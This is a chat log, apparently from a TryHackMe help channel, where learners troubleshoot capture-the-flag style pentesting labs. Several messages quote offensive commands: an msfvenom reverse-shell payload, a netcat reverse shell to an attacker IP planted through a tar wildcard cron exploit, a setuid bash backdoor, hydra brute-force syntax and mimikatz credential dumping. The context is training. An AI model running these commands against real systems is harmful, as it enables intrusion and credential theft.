nmap -sCV -sS -O -A IP
where is your -Pn option???
Thanks! It takes a long time to scan but it works!
Gave +1 Rep to @vernal mason
Why not use rustscan? Way faster
Don't know it... will install
the output from the nmap scans you did above should have told you about the -Pn option, and reading the man page will tell you that option is to skip the ping that checks whether the host is up or not.... for speed you can use -T4 or -T5 if you understand the risk of false positives and negatives increasing with said speed increase
In order to use gatekeeper.exe should I install Windows 7 32-bit to debug it? @hidden shoal can you help me?
no meeping idea
Already done it! Thanks anyway for your answer!! 💪🏻
Gave +1 Rep to @hidden shoal
Does anyone know why I can't connect with rdesktop on the room Corp?
In the room 'Steel Mountain' why can't I overwrite ASCService.exe as Bill? Why can't I delete, rename or overwrite ASCService.exe by moving a file? I can overwrite it by transferring it from my attack machine.
Hi, getting some errors on the room Breaching AD task 3, using the Python script
Hi, where should I start for pentesting?
You might want to post this in #breaching-ad if you haven't already solved this.
I'm not sure, but if I remember correctly you have to stop the ASCService and then upload your msfvenom binary as that service, in the right path of course
And then start the service
Thanks! I managed to do that. What I am trying to understand is how I can overwrite ASCServices.exe when the user 'bill' does not have permission to modify the file.
I'm not sure because I never really checked if he had rights, but I think he has permission to add a file to the path, which can be checked when you run PowerUp.ps1
I could be totally wrong tho and hopefully someone corrects me if I am
Can someone please help me understand why in Kenobi task 4 the last question can only be solved by "echo /bin/sh > curl" and not by "cp /bin/sh /tmp/curl"?
When I try to solve the task with the cp command I get the message "curl: 0: Can't open localhost"; with the echo command I get root access. What makes the difference?
The file with just a path to a command is assumed to be a script
It's a script that doesn't care about the arguments in this case
Thank you very much, now I understand!
Gave +1 Rep to @keen iris
we have a channel for that over at #red-teaming-path 🙂
Omg sorry didn’t see that, thanks
Gave +1 Rep to @rocky wind
Would assume you are going to upload a PHP reverse shell, then visit the page it got uploaded to and capture the reverse shell with netcat
Gave +1 Rep to @vernal mason
Hello all. I am pretty much at the end of Internal, and using hydra to brute force the Jenkins login. Thing is, I'm about 5000 lines through rockyou and don't have it yet. Can I just confirm with anyone that rockyou actually has the correct password in it? XD
By Jenkins login, what is your username?
and yes rockyou has the pw
Having issues with Brainstorm, the FTP directory is not listed so I have no way to grab the files
I have restarted the box multiple times
Anyone else have issues with Brainstorm not working?
Also unable to find Wreath, the network is no longer there, anyone else seen this?
What does it say when you try to list it, something about extended passive mode?
Yes, then it times out after like 5 minutes
Connect to the FTP; the first thing you enter is "passive" to toggle off passive mode
I'm booting up now, will let you know what happens
thank you so much that did it
Gave +1 Rep to @dense gate
Can someone help me understand what this is
eop=$(mktemp).service
What does eop stand for? Kind of confused
From the Vulnversity module, last question
A variable, I guess?
Yeah thank you, I figured out it could be anything
Gave +1 Rep to @magic ivy
Hi.. I'm stuck on the Burp Suite attack and keep getting connection close
read this so u can ask more effectively next time
Looking for help with Burp Suite on intercepting and uploading the payload to find the correct .php extension
There are a couple of Burp Suite rooms, share the room link and the task number pls
In the Breaching AD room I can't connect/ping the servers. I did everything accordingly with my Kali VMware VM
can anyone help?
Have you downloaded the VPN for that room?
@dense gate task 4 in Vulnversity
Share a screenshot of the results you got with Burp pls
You need to disable payload encoding, otherwise the dot will get URL-encoded
You can do that in the payload tab
Look at the responses there
also known as the length part of the list
I mean the actual text in particular
oh
But also yes the length
Having issues with Brainstorm, when in Immunity Debugger it says that the essfunc.dll is Rebase=True when it should be false, any help would be really appreciated, not able to get correct jump address due to this
Anyone around to help out on Vulnversity task 4?
I am confused on how to read the Burp Suite output
YAYYYY I finally did it!
Now my only question is why on the second attempt does the connect
upload not succeed?*
Hello! Can any hacker tell me what goes on in your mind as you are pentesting? I'm trying to figure out the mindset
Getting into something you shouldn't have access to is fun, that's all for me lmao
Love puzzling!
Ok, so I found an (unintended) way to escalate from apache straight to root, without the necessity of using the path from the jjameson user. Is there a channel to report this?
oh, the room is Daily Bugle
cve_2021_4034
I used the exploit suggester in Metasploit and it was the first one on the list
Yes, I was just thinking it was maybe too easy a way to solve it ^^
ok thanks
Hello, I am stuck on the final step in the room Game Zone
When I try to run the Metasploit exploit this error message is shown and no session is created
Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 peeraddr=127.0.0.1:10000 state=error: wrong version number
Can you pls tell me how to fix this?
Hi, I am new here and want to do the OSCP. Can someone please help me with the path? From which course should I start?
Depends on your knowledge level, start with Jr. Pentester
Working on GameZone rn, quick question, did sqlmap take forever to pull out the DB?
I started my sqlmap and literally went to drop off my car for inspection and get a bagel and when I came back it's still going.. lol
Hi everyone, I am currently blocked at this question in the Active Directory module: "Which group normally administrates all computers and resources in a domain?".
I thought it was the group "computers" because in the doc it is specified that any machine joining the network will be put in the computers group.
Maybe it is not about the OU?
Do you have any suggestions?
Is this the AD Basics room @tired salmon?
yes it is @trail shard
Think about what groups are in a domain
The answer is in the text for you
Key word 'Administrates'
Ok I got it, thanks for your help!
no prob
Anyone recently completed GameZone? I've read the root.txt flag but THM is not letting me submit? I wasn't able to get the MSF exploit working but seemed to get it another way, any tips?
you can skip the test other parameters then it will work fine
Finally got the room to accept my answer, why it didn't I'm not sure
I added a space to the front of it lol
@trail shard did your metasploit exploit work?
It did not, I tried to set up the proxies option but I didn't fully understand how the proxies option and the rhosts option were supposed to be set
I had an SSH tunnel with -D 9090 open to the box and I tried setting proxies in msf to socks4:127.0.0.1:9090 but the login attempt would fail
I had to pull up a walkthrough and realized I could read the root flag in the browser but it still bothered me why the msf exploit didn't work
I just didn't know how to make sure it was going thru the proxy alright
also wasn't sure if RHOSTS was supposed to be 127.0.0.1 or something else
RHOSTS was supposed to be set to 127.0.0.1 only
but it was giving me an SSL error so I also had to read the root flag via browser only
yeah same here
Anyone work on Skynet recently? Stuck on getting my reverse shell to execute, I'm following a writeup but just not sure why my shell isn't executing
I included it via RFI, and the web app successfully grabs my PHP shell from my machine but it just doesn't execute and my shell doesn't open on my listener. In the walkthroughs it seems as though the shell will execute when it's fetched from your simple Python server... mine just isn't doing that
I'm stuck in the OVERFLOW1 challenge
Can anybody help me?
When I run exploit.py the final time it says:
Traceback (most recent call last):
File "/home/kali/tryhackme/exploit.py", line 42, in <module>
buffer = prefix + overflow + retn + padding + payload + postfix
TypeError: can only concatenate str (not "bytes") to str
nope not yet.
I've been trying since yesterday.
Okay let's google first.
then I'll ask for help
exploit.py runs when I modify:
buffer = prefix + overflow + retn + padding + payload + postfix
To
buffer = prefix + overflow + retn + padding + str(payload) + postfix
This
but I didn't get the reverse shell.
I'm supposed to get a reverse shell, right?
I know I'm missing something, but I can't find what it is.
Please help me.
@hidden shoal ?
anyone?
Okay I got it.
I generated py instead of c
Inside the payload the msfvenom C code worked.
This code worked inside the payload:
Instead of this code:
I want to know why.
Can anyone tell me what's wrong?
The code is expecting buf to be a string and not bytes. Example would be to remove the 'b' character from each line.
If I convert the payload to str(payload) the Python script runs but won't open the reverse shell.
There is no need to convert the shellcode to a string if you use the msfvenom command provided. You have the correct EIP offset and badchars? ...Try adding a breakpoint at the 'retn' and see what happens as the code executes. Do you jump to the NOP addresses?
Hey, I am at first question of task 4 in this room https://tryhackme.com/room/fileinc , and it won't accept my answer. Can't figure out why. I am seeing the contents of /etc/passwd when using the url <ip>/playground.php?file=../../../etc/passwd in my browser, so I would assume /playground.php?file=../../../etc/passwd is the URL it is asking for?
Ah
thanks
Hmm, it doesn't accept /lab1.php?file=../../../etc/passwd either
Yeah, I have the correct EIP offset, badchars and jump to the NOP addresses.
I'm facing another problem. I'm doing the Brainstorm challenge. I connected to the FTP server but when I try "ls" or "dir" the ftp hangs and says "229 Entering Extended Passive Mode (|||49339|)"
Anyone having this issue?
did you try to use the full file path instead of path traversal?
Hi, I have a problem setting up DNS in Breaching Active Directory in the Active Directory section, anyone had a similar issue?
Same here
I got $ nslookup thmdc.za.tryhackme.com
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN and can't access http://ntlmauth.za.tryhackme.com/
I know those are in the room, but when I try that from the room I have: nslookup thmdc.za.tryhackme.com
;; communications error to 10.200.54.101#53: timed out
yes, tun0 10.50.23.41...
and I have ping response, ping -a 10.200.25.101
PING 10.200.25.101 (10.200.25.101) 56(84) bytes of data.
64 bytes from 10.200.25.101: icmp_seq=1 ttl=127 time=50.5 ms
└─$ cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.
search za.tryhackme.com
nameserver 10.200.25.101
nameserver 8.8.8.8
new one is here 🙂 └─$ nslookup thmdc.za.tryhackme.com
;; communications error to 10.200.25.101#53: timed out
;; communications error to 10.200.25.101#53: timed out
To whoever has issues with the Brainstorm room, just try to use a different VPN and disable passive mode, then it will work fine 👍
Now it works, not sure what I have done exactly 🙂
hey guys
I'm trying the Breaching Active Directory room
but I can't quite set things up
I added the DNS but it doesn't resolve the domain
can't quite ping the THMDC either
I'm using the AttackBox btw
lol I scrolled up and see many people having the same problem
Hi there, I am looking for a solution for exploiting EternalBlue without msfconsole, just wondering if there are any good articles as a reference on how to use 42315.py for exploiting this vuln? I've read a lot of tutorials and none of them work at all
Will give it a go, thanks
Gave +1 Rep to @hidden shoal
Hello, I am working on Alfred. I have been able to get a shell on bruce. I can upload files like winPEAS or the msfvenom payload but I am unable to execute them. I have tried to start PowerShell from the command line but it just hangs. Can I get a little nudge as to how I either get these programs to run or how I get PowerShell going from the shell I have now? Thank you.
Ok... found a way around the above issue. I was able to load incognito.exe onto the target machine via cmd, ran it, added a new user and made them administrator. But now there is no Administrator, and even when I RDP into the machine I can't find a root.txt flag haha. Have I completely butchered this? Can anyone point me in the right direction?
Hey I am working on the Buffer Overflow Prep room. I was able to do OVERFLOW1 with no problems. However, with OVERFLOW2 and OVERFLOW3, I can find the offset correctly and find all bad chars but not getting a call back from my shell code. Should I be able to? The only questions involve finding the offset and bad chars but I'd like to exploit each one if possible. Just not sure if I should even be able to or not... thanks!
C:\Users\t1_leonard.summers\Desktop>Flag.exe
Flag.exe
Sorry! You are still missing something. No flag for you yet. (7)
Anybody seen this on the Lateral Movement and Pivoting room? Not sure what is missing to run the exe
I did find the jmp as well, I will try some more in a few. Thanks @hidden shoal!
Gave +1 Rep to @hidden shoal
CAN I GET A HACKER FRIEND
For what?
Definitely was me but a good learning opportunity.... I didn't recreate my rev tcp shell code for OVERFLOW2 and it contained bad chars 
Daily Bugle. Is there a problem with the room? The machine responds to ping, I scanned it with nmap and hit it with gobuster just fine. Tried to browse to the website and it never comes up.
Ensure that you use the http protocol instead of https
I ended up using an attack box. That was the first time I've had issues with a webserver from the vpn.
Hello guys, I've been trying to crack a password on the HackPark machine. Sadly, hydra is returning wrong passwords. Has anyone encountered this issue?? Can someone help me regarding this pls.
btw, this is the screenshot of the problem. I hope someone can help me fix this issue. Thanks again, guys
and here's the command that i used: hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.10.12.92 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ZdyCCuhq7zMYBzGN0u%2FVLKAA3chKH3IorFlH89vOh%2BomSd8b86rVGwfadXtfXLtkQgvsLmcuZJ3Lif5BDgKIgVAd9%2B4aKrR%2Fdjls%2BjHl3WB66uSrWPH3CLke0xjEQdhgGqTXakqW%2B3iQRCSSMcWKqa9EWAmWZpdkqh6E8hiKOaMfyNLyb4ALVkMoEPR%2B7zkdpHqC3z2puf7uuO%2BZKqeY%2F5gBglIHcNjGsQR6Gr0zYlCt5z5xjosDWRo7ujSmHNwzheGmzDqLbbuY7rVYvK%2Bpdtffx4drFxa8LKfQlW%2FYbamz5ZCUjiMm%2Fo9rgzfM24292DwPWHecFWfoIksCfiBBDZZsm50MkPLGv1rpR4OVX9p%2F4TCo&__EVENTVALIDATION=HfTlma6Rxo6%2B3RAeSAbbfa3AiyKaoYonq9Ae7aPQ0fg0BbXwqQrHyu7oonvi7heiKSuPgaicKLOpQWJ19IdIOO7CO%2BkdbKY%2BhCCckGkhO58spRDiRAeWlDd4aHVwocGD9UqC9gvpkePUBJ%2BQ0Eb5SSBmLdVHc%2BKDhiA17iW5UMnyE6V8&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv
This normally happens to me when I use the wrong response detection and thus every try is considered correct
Hello, can you please tell me what parameter/s in my command is/are wrong?
@fleet wedge sorry, I don't know the exact solution to this part. I'd run one of these requests through Burp (including this long parameter stuff) and check the result again. Is there really exactly the string "Login Failed" in the response?
If this doesn't help, you might be able to proxy hydra directly through Burp to check the response.
Hello, yes there is. It is the parameter before "-vv"
Not in your command, but in the HTTP response from the webserver to a login attempt made by hydra
yes, there is
Hello, can anyone help me in the buffer overflow room Brainstorm
The first question is how many ports are open
I use nmap and every time I get 3 ports open
but the answer is 6
Can anyone clear up my question?
https://tryhackme.com/room/brainstorm
ok thanks
Hi, I am trying to exploit EternalRed with 40620.py. But I found there is a payload that needs to be specified, which is a shared lib. I am wondering how I can locate or obtain the desired shared library?
Does John the Ripper automatically use the GPU for password cracking?
Hello guys, for those who played the HackPark room, can you tell me why they used 'winPEAS.bat' instead of 'winPEAS.exe'?
@fleet wedge Not sure. I used the x64.exe
To my understanding .bat was made for systems that didn't support winPEAS.exe and is only used if the .exe isn't supported. The exe has colors, easier to read.
thanks for answering
thanks for answering @keen iris
Gave +1 Rep to @keen iris
Hi guys, I'm trying to understand msfvenom payloads.
Usually I use them to generate a payload and then start a multi/handler Metasploit listener with the same payload set
e.g.
Will be executed on the target system
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.165.167 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Metasploit :
set payload windows/shell_reverse_tcp
Why do I need to set a payload on the listener, and could I use a different payload on the listener?
Have an investigation into staged vs stageless
ahhhhh
damn
On stageless I can work with only a listener, right?
A staged payload will connect to the system and then download the rest of the payload
that's why you need to specify it on the listener too
Also bear in mind there's more to a meterpreter than a plain shell payload
Many more features
Hi guys, quick question about SSH tunneling
ssh -L 9000:imgur.com:80 blub@<ip>
Did I get that right?
hmh?
Hi guys, doing the room Relevant right now
http://10.10.75.58:49663/nt4wrksv
this should be a directory of that webserver
but I can't connect to it
Always getting an unable to connect error
How do you know?
I solved it in the nmap portscan
and gobuster findings
Another dumb question, if I want to download PrintSpoofer
which of these files do I need to download?
Hi, I have a question. When I upload the linpeas script to a Linux machine in the /tmp directory and try to run it, nothing happens.
But I can run it in my home directory
Any clue of what is happening? Thanks!
Sorry, the image before doesn't show that I did indeed try to run the script
In the last try there you are trying to run the linpeas script in the home folder and not in the tmp folder
Sorry
as you used cd without an arg which takes you to your home folder
There it is
sorry about before
Is it because /tmp could be in a separate partition or something of the kind?
not sure actually
you could try placing it in /dev/shm and running it from there to see if there is a difference
Ok, I will try it
It seems it doesn't work either
Well, I will run it from my home directory and I will continue, thanks for the help anyway!
Also systemd has private /tmp for different processes etc. You can see that from above.
oh good to know james
The file has size 0. Maybe something broke while copying?
Oh my god, that happened to me hahah
thanks for answering
By the way, anyone here know how to handle hydra http-post-form when the web page displays a complex error message on a failed login attempt?
I think that the problem is I'm not catching the error message well, because it is matching multiple valid credentials
I first thought it would be valid to only copy-paste the middle message but apparently it isn't
That "HTTP 1.1" bit looks bad
Watch what it's doing through burp or wireshark if you can though, that can help massively
I know that I have other tools but I would like to know what I'm doing wrong, because it is obviously a thing in the command. I remember that things like this have already happened when you don't write the error message correctly
but
What do you mean with the HTTP 1.1?
Is it badly written?
Ahh
I understand
fuck hahah
This happens to me from copying from Burp hehe
I already fixed it, but I get the same result
My god
I have it
I will not put the answer here
but
I feel very stupid, I have to say
I think by using Burp / Wireshark he meant "still use hydra, but proxy your requests through Burp". This way you can easily see exactly what hydra sends/receives, and this helps with fixing the command :)
Just for the future. Good you found it
Ok thanks!
But
Can I send login requests through hydra and proxy them through Burp at the same time?
Does hydra have a proxy option?
👍 👍 👍
hi everyone! how are ya? I'm just starting the Buffer Overflow part (https://tryhackme.com/room/bufferoverflowprep) and I'm actually kinda totally lost. First time encountering buffer overflows (I know how it works etc...) but it feels like I'm missing something, some knowledge and basics. Before looking at other stuff around, do you think it's not especially needed because this part contains the basics, or do I need basic knowledge before? thanks
and I'm reading it at the same time tho
The description says it does not teach the basics. So it's probably better to learn BO elsewhere, get used to it and then come back to test the knowledge and learn the mona stuff described in the room
Hi! I'm kind of confused. When I list the binary command I see that the command has the SUID bit enabled; that means I execute it as its owner, root, isn't it?
But when I try to use it, the command assumes that I'm not root. Why is this happening?
I'm the user 'apache' and I wanna edit the crontab file to add a job that makes me root
As I understand it, if the SUID bit is set I should run the binary as root and open /etc/crontab
Root has their own personal crontab, which isn't readable by other users
crontab -e as root will edit that one, rather than the system-wide crontab
Hey guys, I'm not sure how to attach to a listener. I've successfully started a reverse shell but for some reason I'm unable to actually exploit this. Hope this is the right channel, very new to Discord.
yep, it’s a python reverse shell
yeah, I just launched another python reverse shell and got caught immediately. Now how do I "convert" this to a shell?
Damn! Think I got it. It's just Ctrl-D to enter shell

Hello. I keep running into this issue with BloodHound where I will upload/drag-n-drop a provided zip to the BH GUI and my graph never updates. I have the same graph from like....4 rooms ago haha. I've hit refresh, I've restarted BloodHound. How do I get it to populate the correct info? Thank you
I'm in the Exploiting AD room and having trouble with the KeePass part; I never see the explorer process. Any help?
I'm in the Eternal Blue room and I'm trying to run the Metasploit EternalBlue exploit, but it keeps failing :( Any ideas?
I keep terminating and resetting the machine on THM
Which IP are you setting as RHOST?
the machine that I started in the beginning of the room
The IP that appears in the red box?
yes the active machine
Hm, I did it and it worked first time, are you on it now?
I exited out of it for now but I can easily pull it up. I tried multiple times and it didn't work :(
Next time when you set it, type options just to verify you have the correct ones.
If you verify you can send screenshots.
!docs verify
Type options
Is your AttackBox IP "10.0.2.15"?
yes
yes
first time.
......
Try quitting that session msf.
Create a new one.
Just set the exploit to blue, leave the payload and just set RHOST, then run.
I opened up an AttackBox on the TryHackMe website and it worked from that. Is there a specific reason it would work from that and not my own Linux machine?
10.0 is not your VPN IP
I assumed you were on the attackbox...
If you're on a VM with the VPN, set LHOST tun0
Possibility. 😄
If you're on the VPN with a VM, tun0 catches all your reverse shells etc.
It's never been mine.
When I used VB before.
ohhhh ok, I'll try that on my VM. Thank y'all so much
Gave +1 Rep to @finite pivot
The first thing you will see when opening it is your complete OU hierarchy, as defined before. To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the
-->GPO <--
where you want the policies to apply. As an example, you can see there are some already existing GPOs in your machine:
Hi, this is from the Active Directory room
shouldn't that be called
To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the --> OU <---
where you want the policies to apply
Hey everyone, I'm doing the Exploiting AD room, and am getting a mimikatz error.
ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005)
It appears this is due to the installed version of mimikatz being incompatible with the version of Windows it is being used in.
I'd try to get a more current version of mimikatz onto the box, but currently have to use the attack box because the VPN is not working for this network.
If anyone can help, it'd be much appreciated. Attached is a screenshot for reference.
Hi
I would like to get myself started with buffer overflow, but I'm an absolute beginner in everything that has to do with memory, stack, pointers etc
The thing is that I already found some good resources to get started with BOF, but all of them assume that you have an acceptable knowledge of the basics, which I lack.
Anybody here know of some resource or tutorial on BOF for beginners like me or, instead, a resource to learn the necessary basics to start with BOF?
Thanks!
Then I will continue with the tutorials hehehe but, in any case, do you know what the name is of the field of computing that covers memory, stack/heap, pointers etc? I know that maybe it isn't necessary to know this very deeply, but I feel more comfortable that way
hehehe ok
thanks!
On the topic of buffer overflow, when I try to test the programs in the Brainstorm and Gatekeeper rooms on my host computer they crash at a completely different number than in any guide. I actually fuzzed Gatekeeper to 4000 bytes before I stopped because I knew it was ridiculous. Anyone know why that's happening? I'm testing the programs on Windows 10 with Immunity Debugger
Hello there. Can anyone help me with this? I tried to list files on FTP but it's not working. It is about the room Brainstorm
Connect to the FTP again; the first thing you enter is passive to toggle off passive mode, then run ls as usual
Thank you. It works
Gave +1 Rep to @dense gate
Has anyone here had trouble downloading Immunity Debugger from the ImmunityInc website? I've tried on multiple VMs as well as my host system, and keep getting 404s 😡
hi everyone
have a problem
with joomblah.py
screen
[-] Fetching CSRF token
[-] Testing SQLi
Traceback (most recent call last):
File "joomblah.py", line 314, in <module>
sys.exit(main("http://192.168.10.100:8080/joomla"))
File "joomblah.py", line 310, in main
pwn_joomla_again(options)
File "joomblah.py", line 247, in pwn_joomla_again
tables = extract_joomla_tables(options, sess, token)
File "joomblah.py", line 126, in extract_joomla_tables
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
File "joomblah.py", line 78, in joomla_370_sqli_extract
result += value
TypeError: must be str, not bytes
Which room?
Daily Bugle
Anybody able to help with the Gatekeeper room exploit script not working? I'm using the same script from Brainstorm with minor modifications, but the connection is closing without the bytes being received. Here's a screenshot of the script and the Immunity output.
It's SQLi, so why don't you try sqlmap?
I am working on the Alfred room, I am trying to pass the reverse shell to my Kali VM. I set up the python server to serve the PowerShell script, I get a 200 code however, my netcat does not pick up the reverse shell. I have tried different ports, I have tried resetting my VPN connection, I have read through a few walkthroughs and the only thing that I am seeing is some use a "python -m SimpleHTTPServer" and some use a "python3 -m http.server" - I am using the latter.
Has anyone run into this issue, or am I a one-off?
Hello, everyone
I was trying to do privilege escalation on a Linux machine. There was a script running every minute with root privileges, and I added the following to it
cp /bin/bash /tmp ; chmod +s /tmp/bash
then I started it using /tmp/bash -p. I was root, but with the same env as the low privilege user
This is a demo of what I mean
I'm root but $HOME is /home/juba
The same thing for sudo -l
it asks me for the low privilege user's password, not for the high privilege user (root)
whoami
root
sudo -l
user juba may run .....
Gave +1 Rep to @hidden shoal
Hello, I'm doing the Jenkins machine rn. I don't wanna use Metasploit, so I did a little bit of research and found a few useful scripts for LocalPrivEsc (all kinds of potatoes, RogueWinRM), but I couldn't figure out a way to compile them. No guides touch on that and they have ready .exes, so it must be something very obv that I'm missing. Some help please?
Edit: Please ping me in the response. Thanks !
Hey, I was wondering if anyone might be able to help me with the Gatekeeper room. I am having some difficulty getting a reverse shell for the BOF. I can capture the EIP, get the offset, I've identified the bad characters and gotten the jmp address. I set a break point there and it all worked. So I am thinking there must be something wrong with my payload. I can't get it to pop calc.exe either. I've used both my local Kali and the THM AttackBox with the same results. This is the msfvenom I am using to generate the reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.21.183 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c Any suggestions as to what I am doing wrong? Thanks!
You are the second person this week who has said they cannot get a reverse shell in Gatekeeper despite being confident in the payload. I also could not get a shell, so that makes 3. I think something is wrong with the room...
If you think hacking requires some "magic" tricks you're mistaken. It's hard, often tedious. All you need is motivation. Go take a beginner pathway and complete it without using any walkthroughs.
You mean OS? Kali / Parrot but Kali is imo better
what is Parrot plz
Google it lol?
Human brain has far less storage than google servers. Ask them
hey guys. I'm struggling with task 2 of the Buffer Overflow Prep room because when I try to run this command "!mona compare -f X:\mona\oscp\bytearray.bin -an <address>" Immunity Debugger throws this error "unable to find/read file C:\mona\oscp\bytearray.bin". Does anybody have any idea why?
Did you follow the steps and generate a byte array with the mona command shown in the module?
you should also be able to find the byte array in the mona directory in file explorer
I would agree, but I can't get the shell when running it on a Windows VM either. Maybe it is the gatekeeper.exe, but I have generally found when something is not working it's because I am making an error.
I've tried each US VPN endpoint but the Hackpark machine is just creeping slow. I'm going back through to produce screenshots to accompany my notes and I do not remember this machine struggling this bad.
Has anyone had this issue recently and been able to find a solution? I'm cross posting this from #site-support because this may be a better place to ask this.
I'm having issues with the Internal machine. I don't know if it's my connection or the machine that is lagging, but after 5 minutes on the machine it freezes and I can't interact with it anymore ...
I'll try Hackpark now and let you know. It's one of my favorite rooms.
It’s a fun room for sure but I had some serious stability and latency issues out of it.
I just ran through and didn't see any issues on my end. Was it the nc shell giving you issues?
I'm currently using US VIP west
Hi, I'm doing the Kenobi machine and one of the questions is, how many ports are open? The answer is 7 because I have been trying numbers, but my nmap scan is showing 11 open ports. Can someone explain it? Is it a bug?
Yeah, that's just a bug
ty
hey people, so I just started the BOF room and I can connect with xfreerdp, but I don't get a PING to the machine and nc cannot reach the machine either. Any idea what the problem is?
There is this part :
`On your Kali box, connect to port 1337 on 10.10.163.18 using netcat:
nc 10.10.163.18 1337
Type "HELP" and press Enter. Note that there are 10 different OVERFLOW commands numbered 1 - 10. Type "OVERFLOW1 test" and press enter. The response should be "OVERFLOW1 COMPLETE". Terminate the connection.`
Anyone got tips for the BOF Brainstorm challenge? I cannot start the chatserver.exe on my Windows 7 machine.
Does the Offensive Pentesting path include all the required rooms for the OSCP certificate?
Download the chatserver.exe program from FTP in binary mode
Otherwise your exe will be corrupted
Just type binary in your FTP client
And then download the exe from there
By the way, I want some feedback from those guys who know about BOF about my BOF assistant tool
I know self promotion isn't allowed here
But I want just a feedback about this tool
I created it after learning from the BOF Prep room
If anyone is interested to give me feedback just search
Buffer Overflow Automation
On Google or YouTube
Thanks for the tips !
Gave +1 Rep to @wind geode
Hi, I have a question regarding the Active Directory topic -> Exploiting Active Directory > Exploiting Kerberos Delegation. I log in to Workstation 1, but whenever I try to run mimikatz lsadump::secrets I do not receive the same output as in the example; it rather throws an error (I'm using the AttackBox)
it also seems that the lab is really slow, because at the moment I got stuck trying to replicate an error. Is this normal?
mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942
ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005)
I ran threader3000, but it can't find any open port, while nmap does. In room "Relevant"
I am stuck at the privilege escalation of Skynet, on a tar wildcard exploit to execute your own command. I created the 3 files necessary to make tar run my .sh.
- The .sh contains a nc to my machine (the command is working by hand from the Skynet server)
- The backup.tgz is being created each minute, so cron is running correctly
- I chown 777 the shell.sh thinking it was coming from this
I need another pair of eyes; do you see anything wrong in the file names / content?
www-data@skynet:/var/www/html$ ls
ls
--checkpoint-action=exec=sh shell.sh admin css js
--checkpoint=1 ai image.png shell.sh
45kra24zxs28v3yd config index.html style.css
www-data@skynet:/var/www/html$ cat shell.sh
cat shell.sh
nc 10.11.8.34 3535 -e /bin/bash
My bad, the -e option I added is not recognised by nc; changing the .sh content to create a file did work...
hey guys